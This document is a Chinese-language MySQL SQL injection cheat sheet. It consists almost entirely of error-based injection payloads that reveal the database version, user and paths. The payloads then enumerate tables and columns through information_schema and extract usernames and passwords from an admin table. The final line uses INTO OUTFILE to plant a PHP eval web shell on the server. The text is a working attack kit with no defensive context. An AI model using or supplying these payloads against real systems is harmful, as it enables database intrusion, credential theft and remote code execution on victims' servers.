登录框注入 后台注入 limit注入 X-Forwarded-For 注入 Referer注入 mysql语句构造

语句模型：

and(select 1 from(select count(*),concat((select concat(注入语句) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

爆出一些网站相关信息：

and (select 1 from(select count(*),concat((select concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a)>0

爆数据信息，相关函数：

system_user() 系统用户名

user() 用户名

current_user 当前用户名

session_user() 连接数据库的用户名

database() 数据库名

version() MYSQL数据库版本

load_file() MYSQL读取本地文件的函数

@@datadir 读取数据库路径

@@basedir MYSQL 安装路径

@@version_compile_os 操作系统

information_schema.schemata 数据库名表
information_schema.tables 表名表
information_schema.columns 字段名

'and(select 1 from(select count(*),concat((select concat(相关函数1,0x20,相关函数2,0x20,......) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 2.爆表 'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=数据库的Hex limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=数据库的Hex limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=数据库的Hex limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' ....... 3.爆列 'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' ........ 4.爆用户和密码 'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' ........ ' or 1 AND (SELECT id FROM the_users limit 1 INTO OUTFILE 'D:/sub/jw/safe1.php' lines terminated by '<?php eval($_POST[safe])?>') #